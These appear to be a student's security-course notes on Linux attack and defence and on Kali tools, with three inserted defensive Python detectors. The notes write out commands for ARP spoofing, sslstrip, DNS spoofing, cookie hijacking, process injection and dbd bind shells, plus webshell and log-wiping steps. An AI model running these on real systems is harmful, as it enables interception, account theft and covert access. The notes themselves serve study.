Cybersecurity Week 8 Homework

Textbook learning summary

Linux basic framework

1. Linux advantages: cross-platform hardware support, rich software support, multi-user multi-tasking, reliable security, good stability, and comprehensive network functions.

2. System structure: the kernel, GNU runtime libraries and tools, a command-line shell, a graphical interface (the X Window System and a corresponding desktop environment), and many applications.

3. Functional modules: process and thread management mechanism, memory management mechanism, file system management mechanism, device control mechanism (character device, block device and network device), network mechanism, system call mechanism (software interrupt implementation)

Linux security mechanisms

1. Identity authentication mechanism:

Users (the root user, ordinary users, and system users)

User group (a collection of user accounts with the same characteristics)

Local login authentication: password hashing used the DES algorithm early on, then MD5 and Blowfish, and now SHA-256 and SHA-512; the salt length was extended to 12 characters

Remote login authentication: SSH provides two user authentication mechanisms (the first is password-based authentication; the second is authentication based on asymmetric keys)

Unified authentication middleware, PAM: four management interfaces (authentication management, account management, password management, session management)

2. Authorization and access control mechanism

System security model: file owner, file access permissions (r, w, x), and some special permission bits used for system authorization and access control (the SUID and SGID bits)

Shortcomings and improvements: permissions cannot be assigned at fine granularity; POSIX ACLs were added to Linux as a kernel patch set

3. Security Audit Mechanism

Log subsystem: connection time log, process statistics log, error logging

Audit Daemon

Audit log analysis tools: OSSEC, Snare

Linux remote attack and defense technology

1. Four attack methods: (1) guessing or cracking the user passwords used in the identity authentication of the various network services on the Linux system; (2) probing for and exploiting security vulnerabilities in a listening network service; (3) attacking client programs and users through web Trojans, fraudulent emails, Trojan horse programs and other technical and social-engineering methods; (4) when the Linux system acts as a router connecting several networks, or has "promiscuous mode" enabled to sniff the network, attacking it with specially crafted packets, through which the attacker may gain access.

2. Remote password guessing attack: SSH, telnet, FTP, HTTP

Tools: Brutus (remote password guessing tool), THC Hydra (network login password guessing tool), Cain and Abel

Prevention: use strong passwords; apply strict password management systems and measures on security-sensitive servers; run vulnerable services on non-standard ports; use password-guessing defense software (DenyHosts, BlockHosts, etc.) and the iptables firewall.

3. Remote penetration of network services: the most important channel for system penetration is exploiting security vulnerabilities in listening network services.

4. Vulnerability information databases: CVE, Bugtraq, SecurityFocus, OSVDB

5. Remote penetration attacks against the network services of a Linux system

6. Vulnerabilities in the implementation of the network protocol stack in the kernel

7. Network services in the LAMP web site stack: Apache (HTTP/HTTPS); MySQL (back-end data storage for the web application); PHP (application layer)

8. FTP (TCP 20/TCP 21), Samba (TCP 445) and other file sharing services: FTP servers (ProFTPD, vsftpd)

9. Email sending and receiving service: Sendmail service

10. Other services: OpenSSH, OpenSSL, NFS, etc.

11. Preventive measures: strong passwords; disable unnecessary services; choose secure network protocols and service software; update network service versions promptly; use xinetd and the firewall to add network access control to Linux network services; establish intrusion detection and an emergency response planning process.

12. Attacking Linux client programs and users:

Attacking client programs on the Linux platform: the Firefox web browser, the Thunderbird email client

Attacking Linux users: designing deception scenarios in email and instant messaging, and leaking service configuration information

Prevention: automatic software update mechanisms to improve resistance to spoofing

13. Attacking routers and listeners:

Attacking routers and firewalls: ip_forward=1

net subsystem: route.c (routing address records and packet forwarding), netfilter (firewall configuration)

Attacking listeners and intrusion detectors (libpcap, tcpdump, Wireshark, Snort)

Prevention: know the security and availability of your own network and security devices, think from the attacker's perspective, and master penetration testing tools

Linux local security attack and defense technology

1. Local privilege escalation: crack the root user's password and then run su or sudo to elevate; discover and exploit security vulnerabilities in the su or sudo programs; exploit privilege-escalation vulnerabilities in user-mode SUID programs; exploit privilege-escalation vulnerabilities in Linux kernel code; search the system for globally writable sensitive files and directories and exploit them

2. User password cracking: record line format of the shadow file

Login name, password, last change date, minimum interval, maximum interval, warning period, inactivity period, expiration date.

Tool: John the Ripper

Method: dictionary attack, brute force cracking
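As an added example (not part of these notes), a small Python auditor that parses the shadow record format listed above, classifies each password field by its crypt(3) prefix (the DES, MD5, Blowfish and SHA-256/SHA-512 family named in the authentication section) and flags what a defender would review first: empty passwords, weak hash algorithms and passwords that never expire. The sample records and their hash bodies are constructed.

```python
"""Audit shadow records for weak password hashes and aging settings.
Added example, not part of the notes above; the sample records are constructed
and their hash bodies are filler, not real digests."""
from typing import List, Tuple

# crypt(3) modular format "$id$salt$hash"; a 13-char field with no '$' is legacy DES
ALGO_BY_ID = {"1": "md5", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256", "6": "sha512", "y": "yescrypt"}
WEAK_ALGOS = {"des", "md5"}   # DES truncates passwords to 8 chars; MD5-crypt is cheap to brute-force
# The nine colon-separated fields of a shadow record (the last one is reserved).
FIELDS = ("name", "password", "last_change", "min_days", "max_days",
          "warn_days", "inactive_days", "expire", "reserved")

def parse_shadow_line(line: str) -> dict:
    parts = line.rstrip("\n").split(":")
    if len(parts) != 9:
        raise ValueError(f"expected 9 fields, got {len(parts)}: {line!r}")
    entry = dict(zip(FIELDS, parts))
    for key in FIELDS[2:8]:            # day-count fields; empty means "not set"
        entry[key] = int(entry[key]) if entry[key] else None
    return entry

def hash_algorithm(password: str) -> str:
    """Return 'empty', 'locked', an algorithm name, or 'unknown'."""
    if password == "":
        return "empty"
    if password[0] in "!*":            # '!' or '*' prefix: password login disabled
        return "locked"
    if password.startswith("$"):
        return ALGO_BY_ID.get(password.split("$")[1], "unknown")
    return "des" if len(password) == 13 else "unknown"

def audit(lines: List[str], max_age_limit: int = 90) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs that a defender should review."""
    findings = []
    for line in filter(str.strip, lines):
        entry = parse_shadow_line(line)
        name, algo = entry["name"], hash_algorithm(entry["password"])
        if algo == "empty":
            findings.append((name, "EMPTY_PASSWORD"))   # login with no password at all
        elif algo in WEAK_ALGOS:
            findings.append((name, f"WEAK_HASH:{algo}"))
        max_days = entry["max_days"]
        if algo not in ("locked", "empty") and (max_days is None or max_days > max_age_limit):
            findings.append((name, "NO_EXPIRY"))        # password never has to be rotated
    return findings

SAMPLE = [   # constructed records in the format described above
    "root:$6$saltsalt$" + "A" * 86 + ":19500:0:99999:7:::",
    "alice:$1$abcdefgh$" + "B" * 22 + ":19500:0:90:7:::",
    "bob:*:19500:0:99999:7:::",
    "guest::19500:0:99999:7:::",
    "legacy:abJnggxhB/yWI:19500:0:99999:7:::",
]
```

Run `audit(SAMPLE)` against a real file by passing `open("/etc/shadow").readlines()` as root; the locked entry (bob) produces no finding because no password login is possible.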

3. The prerequisite for cracking Linux passwords is obtaining the /etc/shadow file

Privilege escalation using sudo flaws

Privilege escalation by exploiting userland SUID program vulnerabilities

Local buffer overflow attack (Ettercap) against SUID programs

Symbolic link attack against SUID programs (Ncpfs - ncpmount)

Race condition attack against SUID programs (Exim)

Shared library attack against SUID programs

Privilege escalation by exploiting kernel-space code vulnerabilities

Prevention: configure SUID privileged programs carefully, watch for security vulnerabilities in the kernel code, configure the system securely, apply SELinux and other security enhancement modules, and raise the overall level of intrusion protection

Covering tracks after a Linux intrusion

1. Modify the current activity logs, clear the login logs (e.g. with the WZAP tool), and clear the command history of the shell

2. Backdoor programs: Trojanized system programs (which always accept the login account configured by the attacker), command-line backdoor tools, and graphical backdoor tools (VNC)


Video learning summary

SET in Kali

1. An open-source, Python-driven social engineering penetration testing tool with a rich library of attack vectors (combined with Metasploit)

2. Enter setoolkit on the command line to open the SET suite

3. Enter 1 (Social Engineering Attacks)

Spear-phishing attacks, website attacks, infectious media attacks, creating a payload and listener, mass mailer attacks, Arduino-based attacks, SMS spoofing attacks, wireless access point attacks, QR code attacks, PowerShell attacks, third-party modules

4. Select the spear-phishing attack. Purpose: to send phishing emails carrying malware; the corresponding payload can be chosen to target different vulnerabilities.

5. Website attack framework: starts a web server and, if the other party visits and has a system vulnerability, implants a backdoor

6. Infectious media attack: uses Autorun.inf to run an exploit and obtain a reverse shell; it can also be combined with a Metasploit backdoor

7. Create Payload and Listener

8. Mass mailer attack: supports importing a list and sending email to everyone on it

9. Arduino-Based Attacks: Hardware Modules

10. SMS spoofing: sending fake SMS messages

11. Wireless access point attack: creates a virtual wireless AP through which all traffic from connecting devices can be captured

12. QR code attack: embeds a malicious URL in a QR code for the target to scan.

13. PowerShell attack: PowerShell attack modules for Vista and above

14. Fast-track attack module

Kali sniffing, spoofing and man-in-the-middle attacks

1. Enable IP forwarding in Kali:

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

2. Set up sslstrip: to hijack SSL traffic, HTTPS has to be downgraded to HTTP, so redirect port 80 to 8081: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081

Let sslstrip listen on port 8081: sslstrip -l 8081

3. Preparation of ettercap:

ettercap is a suite of tools for man-in-the-middle attacks, as well known as the dsniff suite. It supports plug-ins and filter scripts and displays accounts and passwords directly, without manual extraction from the data. Before the first man-in-the-middle operation, ettercap has to be configured under Kali.

The configuration file is /etc/ettercap/etter.conf. First, change ec_uid and ec_gid to 0.

Then, under the Linux section, find the "if you use iptables" lines, remove the comment marks ("#"), and enable forwarding.

4. Using ettercap: open ettercap, choose the Sniff menu, then Unified sniffing, and select the network interface; in the Hosts menu, scan for hosts first and then open the host list

5. Dsniff suite introduction
The Dsniff suite consists mainly of arpspoof and dsniff; the former performs ARP spoofing, the latter does the sniffing. The attack steps are as follows:

Perform ARP spoofing: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host, where interface is the network card, -c selects the spoofing method (usually both), target is the victim and host is the gateway

Sniff: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
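The detection counterpart to the arpspoof step, added here as an example and not part of the notes: arpspoof re-announces the gateway's IP with the attacker's MAC every couple of seconds, so a sensor that records the (timestamp, sender IP, sender MAC) of each ARP reply on the segment can flag the binding change, one MAC claiming several IPs, and the reply flood. The sensor format and the observations are constructed; the `trusted` map is an assumed static-ARP baseline.

```python
"""Detect ARP spoofing from observed ARP replies (added example, not from the notes).
arpspoof binds the gateway's IP to the attacker's MAC by sending unsolicited ARP
replies every couple of seconds, so a sensor on the segment can watch for the
IP->MAC binding changing, one MAC claiming several IPs, and reply floods.
The observations below are constructed, not captured traffic."""
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

Observation = Tuple[float, str, str]   # (timestamp, sender IP, sender MAC) of one ARP reply
Alert = Tuple[str, str, str]           # (kind, subject, detail)

def detect_arp_spoof(observations: List[Observation],
                     trusted: Optional[Dict[str, str]] = None,
                     max_replies_per_min: int = 12) -> List[Alert]:
    """`trusted` seeds the table, e.g. the gateway's real MAC from a static ARP entry."""
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}   # current IP -> MAC
    claims: Dict[str, Set[str]] = defaultdict(set)                     # MAC -> IPs it announced
    times: Dict[str, List[float]] = defaultdict(list)                  # IP -> reply timestamps
    alerts: List[Alert] = []
    for ts, ip, mac in observations:
        mac = mac.lower()
        prev = table.get(ip)
        if prev is not None and prev != mac:
            alerts.append(("MAC_CHANGED", ip, f"{prev} -> {mac}"))
        table[ip] = mac
        claims[mac].add(ip)
        times[ip].append(ts)
    for mac, ips in claims.items():
        if len(ips) > 1:   # one station impersonating gateway and victim (arpspoof -c both)
            alerts.append(("MULTI_IP_MAC", mac, ",".join(sorted(ips))))
    for ip, stamps in times.items():
        stamps.sort()
        for i, start in enumerate(stamps):
            in_window = sum(1 for t in stamps[i:] if t - start <= 60)
            if in_window > max_replies_per_min:
                alerts.append(("REPLY_FLOOD", ip, f"{in_window} replies within 60s"))
                break
    return alerts

# Constructed scenario: the real gateway and victim each reply once, then an attacker
# poisons both of them every two seconds.
GATEWAY, VICTIM, ATTACKER = "192.168.1.1", "192.168.1.102", "192.168.1.50"
LEGIT = {GATEWAY: "00:11:22:33:44:01", VICTIM: "00:11:22:33:44:66"}
ROGUE = "de:ad:be:ef:00:01"
SAMPLE: List[Observation] = [(0.0, GATEWAY, LEGIT[GATEWAY]), (1.0, VICTIM, LEGIT[VICTIM]),
                             (2.0, ATTACKER, ROGUE)]
SAMPLE += [(5.0 + 2 * k, GATEWAY, ROGUE) for k in range(16)]
SAMPLE += [(6.0 + 2 * k, VICTIM, ROGUE) for k in range(16)]
```

Seeding `trusted` with the gateway's real MAC catches the very first rogue reply even if the sensor never saw the legitimate one.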

6. Session hijacking
Here we use cookies as the example to illustrate session hijacking.

Start ARP spoofing: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102

Capture packets: tcpdump -i wlan0 -w test.cap

After a while, once the target has presumably logged in to a website, we process the captured packets:
ferret -r test.cap

If the capture is fine and port forwarding is confirmed to be enabled, processing the packets automatically generates hamster.txt

Next, run hamster; it will prompt you to set the browser proxy to http://127.0.0.1:1234

Then open hamster in the browser at http://hamster, select the target and the likely login/authentication address, and click the link to find that the hijacking has succeeded.

7. Image interception
Using driftnet, we can see the images on the websites the victim visits.

First, start ARP spoofing with arpspoof as before, then start driftnet: driftnet -i <interface>
A small window pops up; when the target visits a website with images, the attacker sees them in this window.

8. DNS spoofing
Using dnsspoof from the Dsniff suite or the dns_spoof plug-in of ettercap, we can carry out DNS spoofing against the victim.

Before starting the spoofing, we first need to write our own hosts file and put it somewhere easily accessible. Its content resembles the system's own hosts file: just write the domain name to spoof and the address to redirect it to (usually a server designated by the attacker that performs browser-overflow or Java-applet attacks to gain access to the victim's computer).

hosts file: 127.0.0.1 www.baidu.com
The above is an example hosts file that points Baidu at this machine. We save it as hosts in the /root directory.

Then start dnsspoof: dnsspoof -i wlan0 -f /root/hosts, and have the victim visit Baidu to observe the effect

9. URL monitoring
Using the urlsnarf tool in the Dsniff suite, we parse HTTP traffic on TCP ports 80, 3128 and 8080 and can dump all sniffed HTTP requests in Common Log Format (CLF). This format is used by many web servers, such as IIS and Apache, so the results can conveniently be analyzed afterwards with standard log analysis tools.

10. Download software monitoring
Using the filesnarf tool in the Dsniff suite, we can select a file from the sniffed NFS communication and dump it to the local current working directory.

Kali privilege maintenance

1. There are three subcategories: the Tunnel toolset, web backdoors and system backdoors. System backdoors and web backdoors are collectively referred to as backdoors.

2. Weevely: a Python webshell tool, the Linux replacement for the "China Chopper" (caidao) webshell client (limited to PHP)

Generate a backdoor, upload it to the web server, and connect with weevely to obtain a webshell

3. WeBaCoo: a small, stealthy PHP backdoor that provides a terminal for connecting to a remote web server and executing PHP code. WeBaCoo transmits command results in HTTP response headers, and the shell commands are base64-encoded and hidden in cookies.

Generate a webshell, upload it to the website and connect with webacoo; commands entered with the prefix run locally, commands without it run through the webshell

4. Cymothoa system backdoor:
Find the PID of the process to inject into, e.g. a /bin/bash process: ps aux | grep "/bin/bash -k password"

cymothoa -p 10500 -s 0 -y 2333 (inject into PID 10500 and bind port 2333); if successful, connecting to port 2333 returns a shell

5. dbd/sbd: can be understood as an encrypted version of nc

Listening side: dbd -l -p 2333 -e /bin/bash -k password

Attacker: dbd 127.0.0.1 2333 -k password

6. U3-Pwn: targets removable media such as CD-ROM images and USB flash drives

7. Intersect: create scripts, add modules and functional components freely, and generate a shell

Tunnels for privilege maintenance

1. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies

2. CryptCat
Netcat, the Swiss Army knife of network tools, is familiar to everyone, but the tunnel it establishes is not encrypted, hence cryptcat. Usage is similar to dbd/sbd.

3. DNS2TCP: a DNS tunnel (DNS channel), as the name suggests, uses the DNS query process to establish a tunnel and transmit data.

In public places such as hotels there is usually a Wi-Fi signal, but when you visit the first website a window pops up asking for a username and password, and only after logging in can you continue browsing (this is generally implemented as a transparent HTTP proxy). However, sometimes the DNS address obtained is valid and can be used for DNS queries; DNS tunnelling can then be used to obtain free Internet access.
The principle of a DNS tunnel is to have the DNS server in the local network forward our data through a specific server. Many tools implement DNS tunnels, such as OzymanDNS, tcp-over-dns, Heyoka, iodine and dns2tcp.
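The detection side of the DNS tunnelling just described, added here as an example and not part of the notes: tools like dns2tcp and iodine put their data in the subdomain labels of queries to one zone, so a resolver log shows many unique, long, high-entropy names under that zone. The (client, qtype, qname) record format, the two-label zone split and the thresholds are assumptions, and the query records are constructed.

```python
"""Score DNS query records for tunnelling (added example, not from the notes).
dns2tcp, iodine and similar tools carry data in the subdomain labels of queries to a
zone the operator controls, so the traffic shows many unique, long, high-entropy names
under one zone, often as TXT/NULL queries. Records below are constructed in a
simplified (client, qtype, qname) form, not a real resolver log format."""
import base64, hashlib, math
from collections import defaultdict
from typing import Dict, List, Tuple

Query = Tuple[str, str, str]                # (client IP, query type, query name)
DATA_QTYPES = {"TXT", "NULL", "KEY", "MX"}  # types whose answers can carry large payloads

def shannon_entropy(text: str) -> float:
    """Bits per character; random base32/base64 data scores far above plain words."""
    counts: Dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0

def split_name(qname: str) -> Tuple[str, str]:
    """Return (subdomain part, zone), treating the last two labels as the zone.
    Assumption: no public-suffix list, so zones such as co.uk would be mis-split."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def zone_stats(queries: List[Query]) -> Dict[str, Dict[str, float]]:
    acc = defaultdict(lambda: {"count": 0, "len": 0, "entropy": 0.0, "data": 0, "unique": set()})
    for _client, qtype, qname in queries:
        sub, zone = split_name(qname)
        a = acc[zone]
        a["count"] += 1
        a["len"] += len(sub)
        a["entropy"] += shannon_entropy(sub.replace(".", ""))
        a["data"] += qtype.upper() in DATA_QTYPES
        a["unique"].add(sub)
    return {z: {"count": a["count"], "avg_len": a["len"] / a["count"],
                "avg_entropy": a["entropy"] / a["count"],
                "unique_ratio": len(a["unique"]) / a["count"],
                "data_qtype_ratio": a["data"] / a["count"]} for z, a in acc.items()}

def find_tunnels(queries: List[Query], min_queries=20, min_avg_len=30,
                 min_entropy=3.5, min_unique_ratio=0.9) -> List[str]:
    """Zones matching all tunnel traits; the thresholds are assumptions to tune per network."""
    return sorted(z for z, m in zone_stats(queries).items()
                  if m["count"] >= min_queries and m["avg_len"] >= min_avg_len
                  and m["avg_entropy"] >= min_entropy and m["unique_ratio"] >= min_unique_ratio)

def _fake_payload(i: int) -> str:   # constructed base32 chunk standing in for tunnelled data
    return base64.b32encode(hashlib.sha256(str(i).encode()).digest()).decode().lower()[:50]

SAMPLE: List[Query] = [("10.0.0.7", "TXT", f"{_fake_payload(i)}.t.example.net") for i in range(40)]
SAMPLE += [("10.0.0.7", "A", n) for n in ("www.example.com", "mail.example.com",
                                          "www.example.com", "cdn.example.com")] * 10
```

Ordinary browsing to example.com fails the length, entropy and uniqueness tests even though it has the same query count, so only the tunnel zone is reported.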

4. Iodine

5. Miredo: a network tool mainly used for IPv6 Teredo tunnelling on BSD and Linux. It can give IPv6 connectivity to network connections that do not support IPv6; the kernel needs IPv6 and TUN tunnel support.

6. Proxychains: a tool often used in intranet penetration testing. For example, after opening a Socks4a proxy service with Meterpreter, adding that proxy to the /etc/proxychains.conf configuration file lets other tools such as sqlmap and nmap scan the intranet through the proxy directly.
For example: proxychains nmap 10.0.0.1/24

7. Proxytunnel: connects to a remote server through a standard HTTPS proxy; it is a proxy that implements bridging, specifically for carrying SSH over HTTP(S).
Proxytunnel can be used to: create a communication channel through an HTTP(S) proxy (using the HTTP CONNECT command); act as a client driver for OpenSSH, creating SSH connections over an HTTP(S) proxy; and, as a standalone application, connect to remote servers.

8. Ptunnel: Establish tunnel communication with ICMP packets

9. pwnat: communicate via UDP inside an intranet

10. Socat: can forward data on different protocols

11. sslh:

An SSL/SSH port multiplexing tool: sslh can accept HTTPS, SSH and OpenVPN connections on the same port, which makes it possible to reach an SSH or OpenVPN server through port 443 while still serving HTTPS on that port. sslh is a good example for studying port multiplexing.

Kali reverse engineering tools

1. Includes debuggers, decompilers and other reverse toolsets

2. edb-debugger: a binary debugger built on Qt4, designed along the lines of OllyDbg. Its functionality can be extended through a plug-in system; currently only Linux is supported.

3. OllyDbg: the classic Ring 3 debugger, a dynamic debugging tool that combines features of IDA and SoftICE. Under Kali, OD runs in Wine.

4. Jad: Decompilation tool for Java

5. Radare2: An open source reverse engineering platform that supports disassembly, debugging, analysis and manipulation of binary files, including rabin2, radiff2, rasm2 and other tools

6. REC Studio (Recstudio): reads Windows, Linux, Mac OS X or raw executables and tries to present the code and data in C

7. Apktool: an APK tool provided by Google that can disassemble or recompile an apk and install the framework-res framework an apk requires

8. clang, clang++: Clang is a lightweight compiler for C, C++, Objective C++ languages

9. d2j-dex2jar: converts a dex file into a jar file, after which other tools can be used to view the source code

10. flasm: directly modifies the ActionScript in an swf file. Software that converts swf to fla cannot guarantee 100% restoration, so if only the AS script code needs changing, flasm is the best choice, because it modifies only the script and leaves the resource data untouched. At present flasm supports swf files in Flash 8 and earlier formats.

11. Javasnoop: a Java application security testing tool that lets you intercept and tamper with data and hack Java applications running on your computer. Can't test without source code.

It allows you to attach directly to a running process, like a debugger, and then immediately tamper with method calls, run custom code, or just monitor what is going on in the system.
